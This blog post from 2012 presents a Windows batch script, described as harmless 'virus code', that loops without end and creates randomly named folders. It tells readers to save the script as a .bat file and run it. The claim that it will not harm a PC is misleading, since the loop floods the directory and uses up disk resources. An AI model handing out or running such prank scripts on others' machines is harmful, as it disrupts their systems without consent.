Monday, July 16, 2012

Create Infinite Folders in a Second

Hi , this batch code will very helpful for you.  
This is simple and effective virus code.
P.S ---> It will not Harm your PC.

 
  
  •    As usual open notepad.
  •   Copy this code to Notepad.

@echo off
:top
md %random%
goto top
 What all these lines do ?
  • @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
  • md %random% is command that creating folders with random names.
  • goto top – return to label :top , infinite loop
 Save the file with .bat extension(for eg: folderscreate.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is. 
[ Make sure to put this file in a Folder and then run it otherwise it will flood the place ! ]




Show you Appreciation by Liking and Sharing the Post . Also Subcribe for More :)
If you face any problems or doubts in this post , Please let us know in the comments below .

0 comments:

Post a Comment